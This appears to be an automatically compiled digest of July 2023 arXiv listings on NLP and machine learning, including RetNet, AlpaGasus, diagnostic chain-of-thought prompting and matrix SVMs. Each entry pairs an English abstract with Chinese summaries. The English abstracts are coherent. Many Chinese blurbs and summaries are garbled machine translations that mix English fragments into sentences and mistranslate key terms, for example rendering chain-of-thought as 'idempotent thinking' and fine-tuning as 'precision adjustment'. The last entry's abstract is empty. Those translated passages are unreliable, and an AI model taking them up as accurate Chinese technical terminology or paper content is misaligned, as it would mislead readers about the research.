fine-tuning on both natural language understanding (NLU) and generation (NLG) tasks are provided to verify the effectiveness of the proposed method MLP fusion. Our code is available at https://github.com/weitianxin/MLP_Fusion.

摘要
通用抽象语言模型（PLM）的精度调整被认为是许多自然语言处理应用中的主流策略。然而，即使进行PLM的精度调整和推理都是昂贵的，特别是在edge设备上，这些设备具有较低的计算力。一些通用的方法（如量化和精炼）已经广泛研究，以减少PLM精度调整的计算/存储量。然而，对于一键压缩技术，尚未得到充分的研究。在这篇论文中，我们 investigate了多层感知器（MLP）模块在PLM中的神经凝结阵（NTK），并提议使用NTK-近似MLP融合来创造轻量级PLM。为实现这一目标，我们将MLP视为一个包含多个子MLP的Bundle，然后将它们分为一定数量的中心点，并将这些中心点还原为一个压缩后的MLP，并Surprisingly Shown to well approximate the NTK of the original PLM。我们提供了对PLM精度调整的NLU和NLG任务的广泛实验来验证提议的效果。代码可以在https://github.com/weitianxin/MLP_Fusion上找到。

Teach model to answer questions after comprehending the document

paper_url: http://arxiv.org/abs/2307.08931
repo_url: None
paper_authors: Ruiqing Sun, Ping Jian
for: 提高多选机器阅读理解（MRC）任务的表现，使模型更好地理解文本。
methods: 提出了一种两stage知识塑造方法，将MRC任务分为两个阶段，使模型更好地理解文本。
results: 实验结果显示，当student模型采用我们的方法时，对MRC任务的表现有显著改善，证明了方法的效果。

Abstract
Multi-choice Machine Reading Comprehension (MRC) is a challenging extension of Natural Language Processing (NLP) that requires the ability to comprehend the semantics and logical relationships between entities in a given text. The MRC task has traditionally been viewed as a process of answering questions based on the given text. This single-stage approach has often led the network to concentrate on generating the correct answer, potentially neglecting the comprehension of the text itself. As a result, many prevalent models have faced challenges in performing well on this task when dealing with longer texts. In this paper, we propose a two-stage knowledge distillation method that teaches the model to better comprehend the document by dividing the MRC task into two separate stages. Our experimental results show that the student model, when equipped with our method, achieves significant improvements, demonstrating the effectiveness of our method.

摘要
多选机器阅读理解（MRC）是自然语言处理（NLP）的一个挑战性扩展，需要模型理解文本中实体之间的 semantics 和逻辑关系。传统上，MRC 任务被视为Answer questions based on the given text的一个过程。这种单个阶段approach 经常导致网络偏重于生成正确的答案，可能忽略文本本身的理解。因此，许多常见模型在处理 longer texts 时会遇到问题。在这篇论文中，我们提出了一种两个阶段知识填充方法，该方法将 MRC 任务分解为两个独立的阶段。我们的实验结果表明，当Student模型搭配我们的方法时，它们在MRC任务上表现出了显著改善，这demonstrates the effectiveness of our method。

Large Language Models Perform Diagnostic Reasoning

paper_url: http://arxiv.org/abs/2307.08922
repo_url: https://github.com/nlplab-best-team/diagnostic-reasoning
paper_authors: Cheng-Kuang Wu, Wei-Lin Chen, Hsin-Hsi Chen
for: 这 paper 的目的是探讨自动诊断任务中的幂等思维（Chain-of-Thought，CoT）提问的扩展。
methods: 该 paper 使用的方法是基于医生的底层思维过程，提出了诊断理解Chain-of-Thought（DR-CoT）。
results: 实验结果表明，只使用通用文本库训练的大语言模型，并使用两个 DR-CoT 示例，可以提高自动诊断的准确率15%，并在域外设置中达到了18%的差异。这些结果表明，通过适当的提问，可以在大语言模型中激发专家知识的推理。

Abstract
We explore the extension of chain-of-thought (CoT) prompting to medical reasoning for the task of automatic diagnosis. Motivated by doctors' underlying reasoning process, we present Diagnostic-Reasoning CoT (DR-CoT). Empirical results demonstrate that by simply prompting large language models trained only on general text corpus with two DR-CoT exemplars, the diagnostic accuracy improves by 15% comparing to standard prompting. Moreover, the gap reaches a pronounced 18% in out-domain settings. Our findings suggest expert-knowledge reasoning in large language models can be elicited through proper promptings.

摘要
我们探索了思维链（CoT）提示的扩展到医学理解，以提高自动诊断的精度。受医生的深层次思维过程 inspirits，我们提出了诊断思维链（DR-CoT）。我们的实验结果表明，只需通过对通用文本库进行训练，并使用两个DR-CoT示例来提示大语言模型，可以提高自动诊断的准确率15%，并在 OUT-DOMAIN Settings 中提高了18%。我们的发现表明，通过合适的提示，大语言模型中的专家知识 reasoning 可以被诱导出来。

An Integrated NPL Approach to Sentiment Analysis in Satisfaction Surveys

paper_url: http://arxiv.org/abs/2307.11771
repo_url: None
paper_authors: Edson B. Pinto-Luque
For: The paper aims to apply an integrated approach to natural language processing (NLP) to satisfaction surveys in order to understand and extract relevant information from survey responses, analyze feelings, and identify recurring word patterns.* Methods: The paper will use NLP techniques such as emotional polarity detection, response classification into positive, negative, or neutral categories, and opinion mining to highlight participants’ opinions. The analysis of word patterns in satisfaction survey responses will also be conducted using NLP.* Results: The paper will obtain results that can be used to identify areas for improvement, understand respondents’ preferences, and make strategic decisions based on analysis to improve respondent satisfaction. The results will provide a deeper understanding of feelings, opinions, and themes and trends present in respondents’ responses.

Abstract
The research project aims to apply an integrated approach to natural language processing NLP to satisfaction surveys. It will focus on understanding and extracting relevant information from survey responses, analyzing feelings, and identifying recurring word patterns. NLP techniques will be used to determine emotional polarity, classify responses into positive, negative, or neutral categories, and use opinion mining to highlight participants opinions. This approach will help identify the most relevant aspects for participants and understand their opinions in relation to those specific aspects. A key component of the research project will be the analysis of word patterns in satisfaction survey responses using NPL. This analysis will provide a deeper understanding of feelings, opinions, and themes and trends present in respondents responses. The results obtained from this approach can be used to identify areas for improvement, understand respondents preferences, and make strategic decisions based on analysis to improve respondent satisfaction.

摘要
这个研究项目旨在应用综合的自然语言处理（NLP）技术来满意调查。它将关注从调查答案中提取有关信息，分析情感和识别反复出现的词语模式。通过NLP技术来确定情感方向，将答案分类为正面、负面或中性等类别，并使用意见挖掘来强调参与者的意见。这种方法可以帮助确定参与者最关心的方面，理解他们对这些方面的看法，并提供改进参与者满意度的信息。在这个研究项目中，word pattern在满意调查答案中的分析将为我们提供更深刻的情感、意见和问题趋势的理解。这些结果可以用来确定改进参与者满意度的方法，了解参与者的偏好，并基于分析来做战略决策。

Comparative Performance Evaluation of Large Language Models for Extracting Molecular Interactions and Pathway Knowledge

paper_url: http://arxiv.org/abs/2307.08813
repo_url: https://github.com/boxorange/bioie-llm
paper_authors: Gilchan Park, Byung-Jun Yoon, Xihaier Luo, Vanessa López-Marrero, Patrick Johnstone, Shinjae Yoo, Francis J. Alexander
for: 本研究旨在使用大型自然语言模型提取生物系统中protein互动和信号通路知识，以解决现有数据库的不完整性和维护困难。
methods: 本研究使用了不同的大型自然语言模型进行蛋白互动、信号通路和基因调节关系的识别任务。
results: 研究发现了不同模型在不同任务中的表现，并提供了可重复的评价指标。未来可能性和剩下的挑战也得到了讨论。

Abstract
Understanding protein interactions and pathway knowledge is crucial for unraveling the complexities of living systems and investigating the underlying mechanisms of biological functions and complex diseases. While existing databases provide curated biological data from literature and other sources, they are often incomplete and their maintenance is labor-intensive, necessitating alternative approaches. In this study, we propose to harness the capabilities of large language models to address these issues by automatically extracting such knowledge from the relevant scientific literature. Toward this goal, in this work, we investigate the effectiveness of different large language models in tasks that involve recognizing protein interactions, pathways, and gene regulatory relations. We thoroughly evaluate the performance of various models, highlight the significant findings, and discuss both the future opportunities and the remaining challenges associated with this approach. The code and data are available at: https://github.com/boxorange/BioIE-LLM

摘要
理解蛋白相互作用和生物路径知识是生命系统复杂性的关键，可以帮助我们理解生物功能和复杂疾病的下面机理。现有的数据库提供了经过 curación的生物数据，但这些数据库通常是不完整的，维护困难重，需要新的方法。在这种情况下，我们提议利用大型自然语言模型来解决这些问题，自动从相关科学文献中提取生物知识。为达到这个目标，我们在这项工作中评估了不同的大型自然语言模型在识别蛋白相互作用、生物路径和基因调节关系等任务中的效果。我们全面评估了各模型的表现，把重要发现提高到位，并讨论了这种方法的未来机遇和剩下的挑战。代码和数据可以在：https://github.com/boxorange/BioIE-LLM 获取。

AlpaGasus: Training A Better Alpaca with Fewer Data

paper_url: http://arxiv.org/abs/2307.08701
repo_url: None
paper_authors: Lichang Chen, Shiyang Li, Jun Yan, Hai Wang, Kalpa Gunaratna, Vikas Yadav, Zheng Tang, Vijay Srinivasan, Tianyi Zhou, Heng Huang, Hongxia Jin
for: 这篇论文的目的是提出一种简单有效的数据选择策略，以提高大型语言模型（LLMs）在 instrucion-finetuning（IFT）过程中的性能。methods: 该策略基于使用一个强大的语言模型（如ChatGPT）来自动识别和除去低质量数据。results: 该策略可以提高 LLMs 的 instrucion-following 能力，并且可以快速减少训练时间。在多个测试集上，AlpaGasus 表现比原始 Alpaca 更好，并且与其教师模型（Text-Davinci-003）的性能相似。

Abstract
Large language models~(LLMs) obtain instruction-following capability through instruction-finetuning (IFT) on supervised instruction/response data. However, widely used IFT datasets (e.g., Alpaca's 52k data) surprisingly contain many low-quality instances with incorrect or irrelevant responses, which are misleading and detrimental to IFT. In this paper, we propose a simple and effective data selection strategy that automatically identifies and removes low-quality data using a strong LLM (e.g., ChatGPT). To this end, we introduce AlpaGasus, which is finetuned on only 9k high-quality data filtered from the 52k Alpaca data. AlpaGasus significantly outperforms the original Alpaca as evaluated by GPT-4 on multiple test sets and its 13B variant matches $>90\%$ performance of its teacher LLM (i.e., Text-Davinci-003) on test tasks. It also provides 5.7x faster training, reducing the training time for a 7B variant from 80 minutes (for Alpaca) to 14 minutes \footnote{We apply IFT for the same number of epochs as Alpaca(7B) but on fewer data, using 4$\times$NVIDIA A100 (80GB) GPUs and following the original Alpaca setting and hyperparameters.}. Overall, AlpaGasus demonstrates a novel data-centric IFT paradigm that can be generally applied to instruction-tuning data, leading to faster training and better instruction-following models. Our project page is available at: \url{https://lichang-chen.github.io/AlpaGasus/}.

摘要
大型语言模型（LLM）通过指令精度训练（IFT）来获得指令遵从能力。然而，广泛使用的 IFT 数据集（例如 Alpaca 的 52k 数据）意外地包含了许多低质量的实例，其中的回答是错误或无关的，这会诱导模型学习 incorrect 的指令遵从能力。在这篇论文中，我们提出了一种简单而有效的数据选择策略，使用强大的 LLM（例如 ChatGPT）自动标识并移除低质量数据。为此，我们引入 AlpaGasus，它是在只有 9k 高质量数据上进行了精度训练。AlpaGasus 与原始 Alpaca 进行比较，在多个测试集上表现出色，并且其 13B 变体与 teacher LLM（i.e., Text-Davinci-003）在测试任务上的性能相似。它还提供了5.7倍快的训练时间，从原始 Alpaca 的 80 分钟减少到 14 分钟。总的来说，AlpaGasus 展示了一种新的数据中心的 IFT 模式，可以通过更快的训练和更高质量的指令遵从模型来提高指令遵从能力。我们的项目页面可以在以下链接中找到：https://lichang-chen.github.io/AlpaGasus/。

Multilingual Speech-to-Speech Translation into Multiple Target Languages

paper_url: http://arxiv.org/abs/2307.08655
repo_url: None
paper_authors: Hongyu Gong, Ning Dong, Sravya Popuri, Vedanuj Goswami, Ann Lee, Juan Pino
for: 本文旨在探讨多种语言间的speech-to-speech翻译（S2ST）技术，以实现不同语言之间的口语沟通。
methods: 本文提出了首先支持多种目标语言的多语言S2ST模型，基于直接S2ST的核心组件：speech-to-unit（S2U）和 vocoder。S2U的多语言扩展为speech-to-masked-unit（S2MU），用于减少语言干扰。 vocoder 则通过语言嵌入和auxiliary损失来学习多语言特征。
results: 在标准翻译测试集上，我们的提议的多语言模型比双语模型在英语到16种目标语言的翻译中表现出色。

Abstract
Speech-to-speech translation (S2ST) enables spoken communication between people talking in different languages. Despite a few studies on multilingual S2ST, their focus is the multilinguality on the source side, i.e., the translation from multiple source languages to one target language. We present the first work on multilingual S2ST supporting multiple target languages. Leveraging recent advance in direct S2ST with speech-to-unit and vocoder, we equip these key components with multilingual capability. Speech-to-masked-unit (S2MU) is the multilingual extension of S2U, which applies masking to units which don't belong to the given target language to reduce the language interference. We also propose multilingual vocoder which is trained with language embedding and the auxiliary loss of language identification. On benchmark translation testsets, our proposed multilingual model shows superior performance than bilingual models in the translation from English into $16$ target languages.

摘要
听说到听翻译（S2ST）可以实现不同语言的人们之间的口头交流。虽有一些关于多语言S2ST的研究，但它们的研究重点在多语言源语言到一个目标语言的翻译方面。我们发表了多语言S2ST的首个研究，利用最新的直接S2ST技术，对关键组件进行多语言化。听说到压制单元（S2MU）是多语言扩展的S2U，它对不属于给定目标语言的单元进行掩蔽，以降低语言干扰。我们还提议多语言 vocoder，通过语言嵌入和 aux 损失来训练。在标准翻译测试集上，我们的提议的多语言模型在英语到 $16$ 个目标语言的翻译中表现出色，比双语模型更高。

Retentive Network: A Successor to Transformer for Large Language Models

paper_url: http://arxiv.org/abs/2307.08621
repo_url: https://github.com/microsoft/unilm
paper_authors: Yutao Sun, Li Dong, Shaohan Huang, Shuming Ma, Yuqing Xia, Jilong Xue, Jianyong Wang, Furu Wei
for: 这篇论文是为了提出一种基于大语言模型的基础架构Retentive Network（RetNet），同时实现培训并行、低成本推理和良好性能。
methods: 论文使用了理论 derivation来连接回归和注意力，并提出了保持机制来实现序列模型，该机制支持三种计算模式：并行、循环和分割循环。
results: 实验结果表明，RetNet在语言模型中实现了有利的扩展结果，并且可以实现并行培训、低成本推理和高效推理。

Abstract
In this work, we propose Retentive Network (RetNet) as a foundation architecture for large language models, simultaneously achieving training parallelism, low-cost inference, and good performance. We theoretically derive the connection between recurrence and attention. Then we propose the retention mechanism for sequence modeling, which supports three computation paradigms, i.e., parallel, recurrent, and chunkwise recurrent. Specifically, the parallel representation allows for training parallelism. The recurrent representation enables low-cost $O(1)$ inference, which improves decoding throughput, latency, and GPU memory without sacrificing performance. The chunkwise recurrent representation facilitates efficient long-sequence modeling with linear complexity, where each chunk is encoded parallelly while recurrently summarizing the chunks. Experimental results on language modeling show that RetNet achieves favorable scaling results, parallel training, low-cost deployment, and efficient inference. The intriguing properties make RetNet a strong successor to Transformer for large language models. Code will be available at https://aka.ms/retnet.

摘要
在这项工作中，我们提出了吸引网络（RetNet）作为大语言模型的基础架构，同时实现了训练并行、低成本推理和良好的性能。我们理论上 derivated了回快和注意力之间的连接。然后我们提出了保留机制，用于序列模型，该机制支持三种计算方法，即并行、循环和块循环。 Specifically，并行表示允许训练并行。循环表示可以在 $O(1)$ 推理成本下进行快速推理，这会提高解码速度、延迟和GPU内存，而无需牺牲性能。块循环表示可以高效地处理长序列模型，每个块都可以并行地编码，而循环 SUMmarize 每个块。实验结果表明，RetNet在语言模型方面实现了有利扩展、并行训练、低成本部署和高效推理。这些特有性使得RetNet成为Transformer的强力继承者。代码将在 https://aka.ms/retnet 上提供。

Multimodal Diffusion Segmentation Model for Object Segmentation from Manipulation Instructions

paper_url: http://arxiv.org/abs/2307.08597
repo_url: None
paper_authors: Yui Iioka, Yu Yoshida, Yuiga Wada, Shumpei Hatanaka, Komei Sugiura
for: 本研究旨在开发一个能够理解自然语言指令（例如“去生活室里取得最近的毯子与广播艺术画作）”并生成这个目标日常物品的分割 маска。这个任务具有三个挑战：一、理解指令中多个物品的引用表达；二、预测句子中的目标词；三、生成像素精度的分割 маска而不是 bounding box。过往的语言基于分割方法有时会遮掩无关区域，导致分割不精确。在本文中，我们提出了多Modal Diffusion Segmentation Model（MDSM），它在第一阶段生成分割 маска，然后在第二阶段进行精确化。我们引入了交叉模式平行特征提取机制，并将扩展散度概率模型以应对交叉模式特征。
methods: 我们提出了 Multimodal Diffusion Segmentation Model（MDSM），它包括以下几个部分：在第一阶段，我们使用交叉模式平行特征提取机制来生成分割 маска；在第二阶段，我们使用扩展散度概率模型进行精确化。
results: 我们在这篇研究中获得了与基准方法相比的大幅提升（+10.13 mean IoU），证明了 MDSM 的效果。

Abstract
In this study, we aim to develop a model that comprehends a natural language instruction (e.g., "Go to the living room and get the nearest pillow to the radio art on the wall") and generates a segmentation mask for the target everyday object. The task is challenging because it requires (1) the understanding of the referring expressions for multiple objects in the instruction, (2) the prediction of the target phrase of the sentence among the multiple phrases, and (3) the generation of pixel-wise segmentation masks rather than bounding boxes. Studies have been conducted on languagebased segmentation methods; however, they sometimes mask irrelevant regions for complex sentences. In this paper, we propose the Multimodal Diffusion Segmentation Model (MDSM), which generates a mask in the first stage and refines it in the second stage. We introduce a crossmodal parallel feature extraction mechanism and extend diffusion probabilistic models to handle crossmodal features. To validate our model, we built a new dataset based on the well-known Matterport3D and REVERIE datasets. This dataset consists of instructions with complex referring expressions accompanied by real indoor environmental images that feature various target objects, in addition to pixel-wise segmentation masks. The performance of MDSM surpassed that of the baseline method by a large margin of +10.13 mean IoU.

摘要
在这个研究中，我们目标是开发一个模型，可以理解自然语言指令（例如，“去生活厅获得最近的柔毂到墙上的广播艺术）”并生成目标日常物体的分割面积。这个任务具有三个挑战：一是理解指令中多个对象的引用表达，二是预测句子中的目标短语，三是生成像素级分割面积而不是边框框。尝试过语言基于分割方法，但它们有时会覆盖无关区域，对于复杂的句子来说。在这篇论文中，我们提出了多Modal扩散分割模型（MDSM），它在第一个阶段生成分割面积，然后在第二个阶段进行精细调整。我们引入了相关的并行特征提取机制，并扩展了扩散概率模型以处理相关特征。为验证我们的模型，我们创建了基于Matterport3D和REVERIE dataset的新 dataset，这个dataset包括具有复杂引用表达的指令，并且拥有真实的室内环境图像和多种目标物体的像素级分割面积。我们的模型在比较基准方法时，表现出了大幅提升的mean IoU值+10.13。

2023-07-18

cs.LG

cs.LG - 2023-07-18

Enhancing Pattern Classification in Support Vector Machines through Matrix Formulation

paper_url: http://arxiv.org/abs/2307.09372
repo_url: None
paper_authors: Sambhav Jain Reshma Rastogi
for: 本研究 paper 的目的是提出一种矩阵形式的支持向量机器 (Matrix SVM)，以解决现有 SVM 模型在多类和多标签 Setting 中的限制。
methods: 本研究使用 Accelerated Gradient Descent 方法在 dual 中进行优化，以提高解决 Matrix-SVM 问题的效率。
results: 实验结果表明，Matrix SVM 在多标签和多类数据集上可以 достичь更高的时间效果，同时保持与 Binary Relevance SVM 相同的结果 Waterfall 。此外，矩阵形式还提供了一些透彻的意见和优势，可能不会在传统的 vector-based notation 中显示出来。

Abstract
Support Vector Machines (SVM) have gathered significant acclaim as classifiers due to their successful implementation of Statistical Learning Theory. However, in the context of multiclass and multilabel settings, the reliance on vector-based formulations in existing SVM-based models poses limitations regarding flexibility and ease of incorporating additional terms to handle specific challenges. To overcome these limitations, our research paper focuses on introducing a matrix formulation for SVM that effectively addresses these constraints. By employing the Accelerated Gradient Descent method in the dual, we notably enhance the efficiency of solving the Matrix-SVM problem. Experimental evaluations on multilabel and multiclass datasets demonstrate that Matrix SVM achieves superior time efficacy while delivering similar results to Binary Relevance SVM. Moreover, our matrix formulation unveils crucial insights and advantages that may not be readily apparent in traditional vector-based notations. We emphasize that numerous multilabel models can be viewed as extensions of SVM, with customised modifications to meet specific requirements. The matrix formulation presented in this paper establishes a solid foundation for developing more sophisticated models capable of effectively addressing the distinctive challenges encountered in multilabel learning.

摘要
支持向量机 (SVM) 在分类方面受到了广泛的赞誉，因为它们成功地应用了统计学学习理论。然而，在多类和多标签设置下，现有的 SVM 基本模型的向量化表述带来了灵活性和特定挑战处理的局限性。为了突破这些限制，我们的研究论文关注在 introducing 矩阵表述方法来解决这些问题。在 dual 中使用加速 gradient descent 方法，我们可以 notable 提高矩阵-SVM 问题的解决效率。实验评估在多标签和多类 datasets 上表明，矩阵 SVM 可以很快地完成任务，同时与 binary relevance SVM 的结果相似。此外，我们的矩阵表述还揭示了一些不太明显的优点和意义，它们可能不会在传统的向量化notation中得到表达。我们强调，许多多标签模型可以被视为 SVM 的扩展，通过自定义修改来满足特定的需求。矩阵表述在这篇论文中建立了一个坚实的基础，用于开发更加复杂的模型，以更好地Addressing 多标签学习中的特殊挑战。

Explanation-Guided Fair Federated Learning for Transparent 6G RAN Slicing

paper_url: http://arxiv.org/abs/2307.09494
repo_url: None
paper_authors: Swastika Roy, Hatim Chergui, Christos Verikoukis
for: 这个论文主要目标是建立在6G网络自动化中的透明性和可信度，通过使用可解释人工智能（XAI）技术来帮助建立AI黑obox中的信任。
methods: 这篇论文使用了closed-loop自动化和解释导向学习（EGL）的方法，并采用Jensen-Shannon（JS）差分来评估模型的解释。
results: 实验结果表明，提出的EGFL-JS方案可以提高了6G网络中RAN掉 Package的损失概率预测的可靠性和公平性，相比之下其他基于文献的基elines的性能提高了 более50%，并且提高了Recall metric的评价分。

Abstract
Future zero-touch artificial intelligence (AI)-driven 6G network automation requires building trust in the AI black boxes via explainable artificial intelligence (XAI), where it is expected that AI faithfulness would be a quantifiable service-level agreement (SLA) metric along with telecommunications key performance indicators (KPIs). This entails exploiting the XAI outputs to generate transparent and unbiased deep neural networks (DNNs). Motivated by closed-loop (CL) automation and explanation-guided learning (EGL), we design an explanation-guided federated learning (EGFL) scheme to ensure trustworthy predictions by exploiting the model explanation emanating from XAI strategies during the training run time via Jensen-Shannon (JS) divergence. Specifically, we predict per-slice RAN dropped traffic probability to exemplify the proposed concept while respecting fairness goals formulated in terms of the recall metric which is included as a constraint in the optimization task. Finally, the comprehensiveness score is adopted to measure and validate the faithfulness of the explanations quantitatively. Simulation results show that the proposed EGFL-JS scheme has achieved more than $50\%$ increase in terms of comprehensiveness compared to different baselines from the literature, especially the variant EGFL-KL that is based on the Kullback-Leibler Divergence. It has also improved the recall score with more than $25\%$ relatively to unconstrained-EGFL.

摘要
未来零点touch的人工智能（AI）驱动的6G网络自动化需要建立AI黑盒子中的信任，通过可解释人工智能（XAI），其中AI的忠诚性将被视为服务级别协议（SLA）度量标准和电信键性表现指标（KPI）。这意味着利用XAI输出生成透明和不偏的深度神经网络（DNNs）。驱动closed-loop（CL）自动化和解释导向学习（EGL），我们设计了一种解释导向联合学习（EGFL）方案，以确保可靠的预测，通过在训练过程中使用XAI策略生成的模型解释。例如，我们预测了无线网络承载层损失报告概率，以 illustrate the proposed concept，并且遵循公平性目标表示为Recall度量，并包含在优化任务中。最后，我们采用了completeness分数来评估和验证解释的 faithfulness 量化。实验结果显示，我们的EGFL-JS方案在比较多个基elines之前获得了超过50%的提高，特别是与基于Kullback-Leibler分配的EGFL-KL变体相比，以及不受限制的EGFL。此外，EGFL-JS还提高了Recall分数，相比未受限制的EGFL，提高了超过25%。

Sparse Gaussian Graphical Models with Discrete Optimization: Computational and Statistical Perspectives

paper_url: http://arxiv.org/abs/2307.09366
repo_url: None
paper_authors: Kayhan Behdin, Wenyu Chen, Rahul Mazumder
For: The paper aims to estimate the inverse covariance matrix of a multivariate Gaussian distribution, assuming it is sparse.* Methods: The proposed method, called GraphL0BnB, is based on an $\ell_0$-penalized version of the pseudolikelihood function and uses a custom nonlinear branch-and-bound framework to solve the resulting mixed integer program.* Results: The paper reports numerical experiments on real and synthetic datasets that demonstrate the effectiveness of GraphL0BnB in solving the problem to near-optimality, even for large problem instances with $p = 10^4$ variables. The paper also compares the performance of GraphL0BnB with various state-of-the-art approaches.Here are the three points in Simplified Chinese:* For: 本文目标是估计多变量 Gaussian 分布下的对角矩阵，假设它是稀疏的。* Methods: 提议的方法是基于 $\ell_0$ 约束的 Pseudolikelihood 函数，使用自定义的非线性分支和约束搜索 Framework 解决 resulting 混合整数程序。* Results: 文章报告了使用真实和 sintetic 数据进行的数值实验，表明 GraphL0BnB 可以准确地解决问题，即使 пробле 的规模很大，例如 $p = 10^4$ 变量。文章还比较了 GraphL0BnB 与不同的现有方法的性能。

Abstract
We consider the problem of learning a sparse graph underlying an undirected Gaussian graphical model, a key problem in statistical machine learning. Given $n$ samples from a multivariate Gaussian distribution with $p$ variables, the goal is to estimate the $p \times p$ inverse covariance matrix (aka precision matrix), assuming it is sparse (i.e., has a few nonzero entries). We propose GraphL0BnB, a new estimator based on an $\ell_0$-penalized version of the pseudolikelihood function, while most earlier approaches are based on the $\ell_1$-relaxation. Our estimator can be formulated as a convex mixed integer program (MIP) which can be difficult to compute at scale using off-the-shelf commercial solvers. To solve the MIP, we propose a custom nonlinear branch-and-bound (BnB) framework that solves node relaxations with tailored first-order methods. As a by-product of our BnB framework, we propose large-scale solvers for obtaining good primal solutions that are of independent interest. We derive novel statistical guarantees (estimation and variable selection) for our estimator and discuss how our approach improves upon existing estimators. Our numerical experiments on real/synthetic datasets suggest that our method can solve, to near-optimality, problem instances with $p = 10^4$ -- corresponding to a symmetric matrix of size $p \times p$ with $p^2/2$ binary variables. We demonstrate the usefulness of GraphL0BnB versus various state-of-the-art approaches on a range of datasets.

摘要
我们考虑一个学习简单Graph的问题，即在无向 Gaussian 统计模型中学习一个简单的 inverse covariance 矩阵（即精度矩阵）。假设这个矩阵只有几个非零元素。我们提出了一个新的估计器，即 GraphL0BnB，它基于一个 $\ell_0$-检测的扩展版 pseudolikelihood 函数。大多数先前的方法则是基于 $\ell_1$-缓和。我们的估计器可以表示为一个内部为整数的混合整数程式（MIP），它可能需要大量的计算资源使用现成的商业解决方案。为解决 MIP，我们提出了一个自定义的非线性分支与缓解（BnB）框架，它可以解决节点缓和使用特制的首项方法。作为我们的 BnB 框架的一个副产物，我们提出了一些大规模的解决方案，可以实现良好的原始解。我们 derive novel 的 statistically garantuees（估计和变数选择） для我们的估计器，并讨论了我们的方法与先前的方法之间的优化。我们的数据实验表明，我们的方法可以对实际数据进行几乎优质的估计，并且可以解决具有 $p = 10^4$ 的问题，即一个对应的矩阵中的 $p^2/2$ 个二进制变数。我们还证明了我们的方法在各种数据集上的优化。

An Evaluation of Zero-Cost Proxies – from Neural Architecture Performance to Model Robustness

paper_url: http://arxiv.org/abs/2307.09365
repo_url: None
paper_authors: Jovita Lukasik, Michael Moeller, Margret Keuper
for: 本文研究zero-cost proxy的应用在 neural architecture search 中，特别是在robustness和clean accuracy之间的joint search。
methods: 本文使用现有的zero-cost proxy来预测模型的性能，并分析这些proxy的特征重要性。
results: 本文发现，单个proxy预测robustness的任务相对更加困难，需要考虑多个proxy来预测模型的robustness。同时，clean accuracy可以由单个proxy进行预测。

Abstract
Zero-cost proxies are nowadays frequently studied and used to search for neural architectures. They show an impressive ability to predict the performance of architectures by making use of their untrained weights. These techniques allow for immense search speed-ups. So far the joint search for well-performing and robust architectures has received much less attention in the field of NAS. Therefore, the main focus of zero-cost proxies is the clean accuracy of architectures, whereas the model robustness should play an evenly important part. In this paper, we analyze the ability of common zero-cost proxies to serve as performance predictors for robustness in the popular NAS-Bench-201 search space. We are interested in the single prediction task for robustness and the joint multi-objective of clean and robust accuracy. We further analyze the feature importance of the proxies and show that predicting the robustness makes the prediction task from existing zero-cost proxies more challenging. As a result, the joint consideration of several proxies becomes necessary to predict a model's robustness while the clean accuracy can be regressed from a single such feature.

摘要
现在，零成本代理常常被研究和使用来搜索神经网络架构。它们能够很好地预测架构的性能，只使用未训练的权重。这些技术可以大大减少搜索速度。迄今为止，搜索well-performing和Robust Architecture在神经网络搜索领域中得到了相对较少的关注。因此，零成本代理的主要焦点是神经网络的净精度，而模型的稳定性应该具有相同的重要性。在这篇论文中，我们分析了常见的零成本代理是否能够用来预测模型的稳定性在NAS-Bench-201搜索空间中。我们对单个预测任务和多目标任务（净精度和稳定性）进行分析。我们还分析了代理的特征重要性，并发现预测稳定性使得预测任务更加困难。因此，需要结合多个代理来预测模型的稳定性，而净精度可以从单个特征进行回归。

MOCA: Self-supervised Representation Learning by Predicting Masked Online Codebook Assignments

paper_url: http://arxiv.org/abs/2307.09361
repo_url: None
paper_authors: Spyros Gidaris, Andrei Bursuc, Oriane Simeoni, Antonin Vobecky, Nikos Komodakis, Matthieu Cord, Patrick Pérez
for: 降低视Transformer网络的贪吃需求，使用自监学习来减少大量完全标注数据的需求。
methods: 提出了一种单Stage和独立的方法MOCA，通过使用高级特征定义的面积预测任务来捕捉具有良好上下文理解性和图像变化不变性的两种自监学习方法。
results: 在低投入设定下实现新的状态纪录Results，并在多种评估协议中显示出了强大的实验性能，训练时间至少3倍 быстреeder than先前的方法。

Abstract
Self-supervised learning can be used for mitigating the greedy needs of Vision Transformer networks for very large fully-annotated datasets. Different classes of self-supervised learning offer representations with either good contextual reasoning properties, e.g., using masked image modeling strategies, or invariance to image perturbations, e.g., with contrastive methods. In this work, we propose a single-stage and standalone method, MOCA, which unifies both desired properties using novel mask-and-predict objectives defined with high-level features (instead of pixel-level details). Moreover, we show how to effectively employ both learning paradigms in a synergistic and computation-efficient way. Doing so, we achieve new state-of-the-art results on low-shot settings and strong experimental results in various evaluation protocols with a training that is at least 3 times faster than prior methods.

摘要
自我监督学习可以用于减轻视力转换网络的贪吃需求，需要很大的完全标注数据集。不同类型的自我监督学习可以提供具有不同特性的表示，如使用遮盲图像模型策略获得良好的上下文理解性，或者使用对比方法获得图像变化的抗变异性。在这项工作中，我们提出了一种单阶段、独立的方法MOCA，它通过定义高级特征的新式遮盲预测目标来 объединить这两种愿望的特性。此外，我们还示了如何有效地使用这两种学习方法，以实现 computation-efficient 的synergistic效果。通过这种方法，我们在低投入设定下 achieve new state-of-the-art 的结果，并在多种评估协议中获得了强大的实验结果，并且训练时间至少3倍 быстреeder than priori方法。

Using the IBM Analog In-Memory Hardware Acceleration Kit for Neural Network Training and Inference

paper_url: http://arxiv.org/abs/2307.09357
repo_url: https://github.com/IBM/aihwkit
paper_authors: Manuel Le Gallo, Corey Lammie, Julian Buechel, Fabio Carta, Omobayode Fagbohungbe, Charles Mackin, Hsinyu Tsai, Vijay Narayanan, Abu Sebastian, Kaoutar El Maghraoui, Malte J. Rasch
for: 本文旨在介绍如何在Analog In-Memory Computing（AIMC）硬件上部署深度神经网络（DNN）推理和训练，以实现与数字计算相同的准确性。
methods: 本文使用IBM的Analog Hardware Acceleration Kit（AIHWKit）Python库来模拟DNN的推理和训练。AIHWKit提供了各种功能和最佳实践来进行推理和训练。
results: 本文提供了AIHWKit在推理和训练DNN时的性能分析和评估。此外，本文还介绍了Analog AI Cloud Composer，它提供了使用AIHWKit simulation platform的完全托管云环境的优势。

Abstract
